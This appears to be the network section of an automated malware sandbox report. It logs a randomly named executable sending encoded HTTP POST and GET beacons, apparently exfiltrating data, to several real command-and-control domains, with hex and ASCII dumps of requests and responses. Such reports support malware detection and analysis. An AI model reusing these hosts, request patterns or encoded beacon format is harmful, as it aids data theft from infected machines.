                        Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                        Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.449745217.160.0.127802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:01.794002056 CEST10870OUTPOST /4c7j/ HTTP/1.1
                        Host: www.complexity.pub
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.complexity.pub
                        Referer: http://www.complexity.pub/4c7j/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6d 51 6b 41 33 31 39 69 6b 6e 76 72 51 6e 56 67 6c 6d 55 77 36 34 49 31 46 34 71 4a 45 30 69 75 43 6d 39 53 6c 6e 4a 54 55 4a 61 6f 77 46 63 6d 4a 64 49 51 49 69 38 4e 64 75 4b 6e 77 52 71 31 6b 67 35 6c 2b 32 53 36 35 6b 5a 6a 74 4d 61 6e 69 50 6b 67 31 4d 33 6f 41 39 62 72 4b 62 71 76 71 71 6e 78 6d 6c 33 50 56 68 4e 37 2b 5a 45 42 73 42 51 57 38 2b 63 33 41 33 39 36 45 54 6c 4f 73 6c 6a 38 4b 77 66 66 58 70 50 53 70 6e 67 2f 4b 42 45 79 45 75 70 44 52 73 63 68 68 75 4b 50 66 36 74 66 2b 76 75 43 39 56 4a 6d 57 64 48 32 6e 32 62 72 59 63 38 52 67 56 4a 42 62 44 7a 45 75 39 74 44 42 4a 45 52 43 70 76 77 43 48 50 52 71 34 32 36 32 79 63 6c 38 66 70 63 54 36 38 39 6b 5a 75 6e 45 32 74 53 53 32 41 73 36 36 68 55 7a 50 35 56 65 71 64 43 30 63 2b 69 46 4a 76 4d 61 46 5a 4f 63 62 70 69 42 38 49 59 79 47 59 32 6d 65 67 76 50 62 50 52 62 30 64 31 45 33 35 41 51 48 75 36 53 47 78 49 4f 4a 42 45 45 62 48 51 36 62 76 6b 6b 73 7a 68 6f 42 72 30 38 47 71 45 67 54 76 [TRUNCATED]
                        Data Ascii: lt=spsn588TGAkFmQkA319iknvrQnVglmUw64I1F4qJE0iuCm9SlnJTUJaowFcmJdIQIi8NduKnwRq1kg5l+2S65kZjtManiPkg1M3oA9brKbqvqqnxml3PVhN7+ZEBsBQW8+c3A396ETlOslj8KwffXpPSpng/KBEyEupDRschhuKPf6tf+vuC9VJmWdH2n2brYc8RgVJBbDzEu9tDBJERCpvwCHPRq4262ycl8fpcT689kZunE2tSS2As66hUzP5VeqdC0c+iFJvMaFZOcbpiB8IYyGY2megvPbPRb0d1E35AQHu6SGxIOJBEEbHQ6bvkkszhoBr08GqEgTvxnXXs84zmf3PmqWFEBcDmYfxwtWgsLTEc/uRv9xkA6kL+32b3RQ4amxGpojAccbDZBtaWGqsIZ20/68hvcYSMFJ/Jgw0oTCxD8ULHhPY0JdtseKtw886flA2ONigHvHPSTjODQuCeMYNFLtk/D5iv3YG9oE/w2D8Lm6+eK9SkKurfGLkajhAFEHH7jECS9mnIQGI4kf6Jd8oDtHG7h8f6W31iu9bySwUhvGb0bGeB1jyMXb45xL5FFlDdLjPoGjA3dmeUjreIjYYjdQOR2zhWwqpyBR84AsRQ1q2RB+5aaqI8UHkCjjE/af8JUP7mxfGn/UoBubI6KOEH34ITY5gikDxGoqV1MiWg8LSNn1uPdLAGdtTnS6ENPCN9cuyF40Re2n6WfEDsnDvJgqayne/JHrYphW43iLAolEFR6O7dhjuODwGoCZoqjkF7HVxjwwtJHeZ20TdsMXhe6LYqgOe4sf/yySsfsIfGZlXuZruE9JtTGpy9X0itbL+iDsKyabZVNW6e391HsWwV9TqxsXOxbNT+ktIkUn1jEoqyztG1ll/oxDrB0w3PEUlD17ICS6//P3hvbNPwlo0puIcgymhVnpipxu0aC7Rgvb+Oo2Tm7srINLT673rECp3qNfM2IKADO3EZp+Ki9I+E7hUXKof9Enk4vWroNt30I [TRUNCATED]
                        Sep 9, 2024 04:52:02.552328110 CEST558INHTTP/1.1 404 Not Found
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Date: Mon, 09 Sep 2024 02:52:02 GMT
                        Server: Apache
                        Content-Encoding: gzip
                        Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                        Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.449746217.160.0.127802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:04.331119061 CEST495OUTGET /4c7j/?3ry=nj20Xr&lt=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM= HTTP/1.1
                        Host: www.complexity.pub
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:04.971285105 CEST745INHTTP/1.1 404 Not Found
                        Content-Type: text/html
                        Content-Length: 601
                        Connection: close
                        Date: Mon, 09 Sep 2024 02:52:04 GMT
                        Server: Apache
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.44974785.159.66.93802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:10.115622997 CEST789OUTPOST /csz1/ HTTP/1.1
                        Host: www.nevsehir-nakliyat.xyz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.nevsehir-nakliyat.xyz
                        Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 4d 33 58 49 4f 45 6c 38 70 57 53 2b 4f 47 4e 55 2f 73 6e 77 4b 33 4d 48 48 74 78 44 6e 64 37 4a 76 7a 69 72 35 56 54 33 57 32 49 31 4f 43 59 78 5a 65 42 30 67 71 53 48 41 51 66 66 30 6f 66 67 79 6b 75 55 43 77 7a 67 42 31 66 6b 43 77 65 45 4c 43 2b 5a 42 50 56 4f 2b 55 45 57 6f 75 79 2b 30 35 4e 48 54 75 66 44 44 37 57 6b 2b 37 33 50 6e 78 73 39 4a 45 31 75 4d 50 4f 30 79 38 45 33 30 64 54 75 61 66 6e 7a 66 4a 35 73 44 52 5a 73 30 49 62 6a 4f 56 49 53 6f 6a 2f 73 66 6e 53 42 6b 54 5a 74 76 2f 77 44 34 66 79 33 4e 63 62 7a 6b 38 70 4c 72 6a 6e 6f 6a 65 66 63 78 6e 4c 64 4f 41 3d 3d
                        Data Ascii: lt=M3XIOEl8pWS+OGNU/snwK3MHHtxDnd7Jvzir5VT3W2I1OCYxZeB0gqSHAQff0ofgykuUCwzgB1fkCweELC+ZBPVO+UEWouy+05NHTufDD7Wk+73Pnxs9JE1uMPO0y8E30dTuafnzfJ5sDRZs0IbjOVISoj/sfnSBkTZtv/wD4fy3Ncbzk8pLrjnojefcxnLdOA==
                        Sep 9, 2024 04:52:10.809689045 CEST225INHTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Mon, 09 Sep 2024 02:52:10 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-09T02:52:15.7001068Z


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.44974885.159.66.93802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:12.673564911 CEST809OUTPOST /csz1/ HTTP/1.1
                        Host: www.nevsehir-nakliyat.xyz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.nevsehir-nakliyat.xyz
                        Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 4d 33 58 49 4f 45 6c 38 70 57 53 2b 4f 6d 64 55 35 50 50 77 4d 58 4d 45 4c 4e 78 44 79 74 37 46 76 7a 65 72 35 55 58 6e 57 6c 38 31 4a 69 49 78 61 66 42 30 74 4b 53 48 4c 77 66 61 36 49 65 73 79 6b 54 68 43 79 33 67 42 31 37 6b 43 78 4f 45 4c 78 47 59 41 66 56 4d 78 30 45 55 6d 4f 79 2b 30 35 4e 48 54 75 62 70 44 39 2b 6b 2b 4b 48 50 6d 51 73 2b 44 6b 31 76 4e 50 4f 30 32 38 45 7a 30 64 54 59 61 61 2f 56 66 4c 52 73 44 54 42 73 30 5a 62 6b 46 56 49 51 6d 44 2b 35 58 56 66 58 70 68 55 77 70 2f 30 6c 31 64 69 4c 49 61 4b 70 31 4e 49 63 35 6a 44 62 2b 5a 57 6f 38 6b 32 55 56 48 62 4d 45 55 34 6b 65 2f 72 34 6e 47 51 62 61 58 46 65 4d 33 4d 3d
                        Data Ascii: lt=M3XIOEl8pWS+OmdU5PPwMXMELNxDyt7Fvzer5UXnWl81JiIxafB0tKSHLwfa6IesykThCy3gB17kCxOELxGYAfVMx0EUmOy+05NHTubpD9+k+KHPmQs+Dk1vNPO028Ez0dTYaa/VfLRsDTBs0ZbkFVIQmD+5XVfXphUwp/0l1diLIaKp1NIc5jDb+ZWo8k2UVHbMEU4ke/r4nGQbaXFeM3M=
                        Sep 9, 2024 04:52:13.357369900 CEST225INHTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Mon, 09 Sep 2024 02:52:13 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 18
                        X-Rate-Limit-Reset: 2024-09-09T02:52:15.7001068Z


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.44974985.159.66.93802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:15.215871096 CEST10891OUTPOST /csz1/ HTTP/1.1
                        Host: www.nevsehir-nakliyat.xyz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.nevsehir-nakliyat.xyz
                        Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 4d 33 58 49 4f 45 6c 38 70 57 53 2b 4f 6d 64 55 35 50 50 77 4d 58 4d 45 4c 4e 78 44 79 74 37 46 76 7a 65 72 35 55 58 6e 57 6b 45 31 4f 52 77 78 61 38 5a 30 73 4b 53 48 45 67 66 62 36 49 65 68 79 6b 4c 74 43 79 71 64 42 33 54 6b 42 54 57 45 4e 41 47 59 5a 50 56 4d 36 55 45 5a 6f 75 79 6e 30 35 39 44 54 75 4c 70 44 39 2b 6b 2b 49 50 50 76 68 73 2b 51 30 31 75 4d 50 4f 77 79 38 45 4c 30 62 37 6d 61 62 4c 46 66 36 78 73 44 7a 52 73 32 76 76 6b 61 6c 49 4f 68 44 2f 36 58 56 53 4a 70 68 34 38 70 38 6f 66 31 66 2b 4c 45 64 47 79 6e 4d 67 48 72 79 7a 67 71 62 43 39 36 6a 69 43 59 47 54 49 53 46 38 71 50 4f 6e 33 6f 32 64 4f 4e 31 56 67 64 41 6c 72 69 63 67 4c 46 48 45 34 53 35 44 6f 41 46 45 63 36 34 57 30 6c 4c 59 65 2f 69 2f 50 37 72 76 38 45 36 4f 49 50 49 57 61 59 63 64 47 77 61 31 49 75 46 72 52 65 44 7a 31 67 55 79 6a 50 50 56 31 73 54 71 55 47 6c 38 66 35 79 31 57 46 61 47 2b 31 78 49 2b 56 48 77 57 76 4c 2b 5a 44 6a 33 2f 76 55 77 4b 66 4b 35 64 39 5a 4d 61 78 6f 73 38 4a 5a 47 4d 6e 52 68 [TRUNCATED]
                        Data Ascii: lt=M3XIOEl8pWS+OmdU5PPwMXMELNxDyt7Fvzer5UXnWkE1ORwxa8Z0sKSHEgfb6IehykLtCyqdB3TkBTWENAGYZPVM6UEZouyn059DTuLpD9+k+IPPvhs+Q01uMPOwy8EL0b7mabLFf6xsDzRs2vvkalIOhD/6XVSJph48p8of1f+LEdGynMgHryzgqbC96jiCYGTISF8qPOn3o2dON1VgdAlricgLFHE4S5DoAFEc64W0lLYe/i/P7rv8E6OIPIWaYcdGwa1IuFrReDz1gUyjPPV1sTqUGl8f5y1WFaG+1xI+VHwWvL+ZDj3/vUwKfK5d9ZMaxos8JZGMnRh8eNBOFdcBtgdnoen6/ET/M/W13WiveWoJMHdB8NJ40YeoubzK569CVAgNE4eFoSl9Hm0z4aaqETq17SQYzuAU2tJ9+i/sCysrWEaug2idctuErizjF0o6BMmI+CEKkkusXaPbjM8KGTfTszY2PwdXGTycLJhDYejyBmC5NPTaTrqE5+7bxLqdDxExsabft1k5CE6HsXytS4TnbMFxZJooEAVYSRF/wK27CFOZOt30CDhGftXuYBrIz7VqCYQHHGH8eedIwil6vIkbYTE2daeVVefPHe2uOrEI3LF6pHNlOjOnXiNsjWSSqfZuIgqijqfnVw2ExcP3Ym0/VT5szCoK/XYWaMDVDm+fzN7QmI1QgejWzHp/X2Hz0qXqJYWZzYEvYNYSU8fS9tVUHakGN3mhqt3knbcKBhS7iHA7mMgPIETjR5dKwqFgdpO7WtrMspCmcg94r5yx1PVac5IWBJM8YuFOqBXeWeTzFXT0MnfqVWLhpO9f5T9DycK+beMkSYCccHAB4u4iR900EI5a+MIixGVczQ0+mxkaHuwmJpBUS2E5qUE6DsFuERsakd/pDfnWZsSSjs8g85n4e3wawWDVaDxP+vm2BxLvG5mGR9YnLOae3r8/epV7EqTsNF96kDquMHj49wu26b9m2fZQlgmti4Hnw7zy6l4ni [TRUNCATED]
                        Sep 9, 2024 04:52:15.900119066 CEST225INHTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Mon, 09 Sep 2024 02:52:15 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-09T02:52:20.7881459Z


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.44975085.159.66.93802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:17.829900980 CEST502OUTGET /csz1/?lt=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&3ry=nj20Xr HTTP/1.1
                        Host: www.nevsehir-nakliyat.xyz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:18.546174049 CEST225INHTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Mon, 09 Sep 2024 02:52:18 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-09T02:52:23.4310316Z


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.44975154.179.173.60802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:23.990776062 CEST777OUTPOST /wg84/ HTTP/1.1
                        Host: www.masteriocp.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.masteriocp.online
                        Referer: http://www.masteriocp.online/wg84/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 38 41 73 79 47 55 39 55 4f 75 4f 49 38 6d 66 4d 30 53 47 31 6b 33 74 6b 32 4a 36 76 2f 70 61 6b 4c 56 50 70 68 55 57 53 4c 4b 77 30 73 35 4b 4f 4c 78 64 72 64 79 36 79 66 42 78 30 43 65 42 4f 33 6e 46 50 64 33 48 69 4d 35 6e 64 6a 66 58 37 50 6c 41 6e 48 4e 68 39 4c 4e 39 34 46 34 67 30 41 56 76 33 50 5a 38 78 7a 58 66 76 49 74 52 64 37 46 78 70 6c 35 6c 54 72 75 70 4a 71 4e 66 61 6b 50 39 54 35 6f 51 39 78 6d 62 75 50 6d 50 56 6e 66 4c 50 72 68 2f 61 7a 31 4f 45 46 42 6d 75 4d 58 50 77 4b 32 6c 30 46 44 74 34 58 48 72 76 50 4e 73 43 66 53 33 46 52 47 5a 30 67 48 36 2f 4e 51 3d 3d
                        Data Ascii: lt=8AsyGU9UOuOI8mfM0SG1k3tk2J6v/pakLVPphUWSLKw0s5KOLxdrdy6yfBx0CeBO3nFPd3HiM5ndjfX7PlAnHNh9LN94F4g0AVv3PZ8xzXfvItRd7Fxpl5lTrupJqNfakP9T5oQ9xmbuPmPVnfLPrh/az1OEFBmuMXPwK2l0FDt4XHrvPNsCfS3FRGZ0gH6/NQ==
                        Sep 9, 2024 04:52:24.881259918 CEST368INHTTP/1.1 301 Moved Permanently
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:52:24 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://www.masteriocp.online/wg84/
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.44975254.179.173.60802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:26.538639069 CEST797OUTPOST /wg84/ HTTP/1.1
                        Host: www.masteriocp.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.masteriocp.online
                        Referer: http://www.masteriocp.online/wg84/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 38 41 73 79 47 55 39 55 4f 75 4f 49 39 47 76 4d 32 7a 47 31 6c 58 74 6e 71 5a 36 76 6d 5a 61 67 4c 56 7a 70 68 56 54 66 4c 38 59 30 73 62 43 4f 4b 77 64 72 61 79 36 79 51 68 78 74 64 75 42 5a 33 6e 4a 70 64 32 37 69 4d 35 44 64 6a 66 6e 37 49 57 6f 6d 47 64 68 37 66 39 39 32 49 59 67 30 41 56 76 33 50 5a 70 71 7a 54 7a 76 49 63 68 64 35 6b 78 6f 76 5a 6c 55 38 65 70 4a 37 39 66 65 6b 50 38 38 35 71 6b 54 78 6a 66 75 50 6a 7a 56 6e 75 4c 4f 34 42 2f 63 75 6c 50 59 4d 78 43 69 56 55 4b 59 56 30 46 73 4d 67 59 66 53 42 36 31 65 38 4e 56 4e 53 54 32 4d 42 51 41 74 45 48 32 57 65 36 48 6f 57 4f 49 47 58 6c 78 4d 66 6d 43 4e 74 75 65 41 75 34 3d
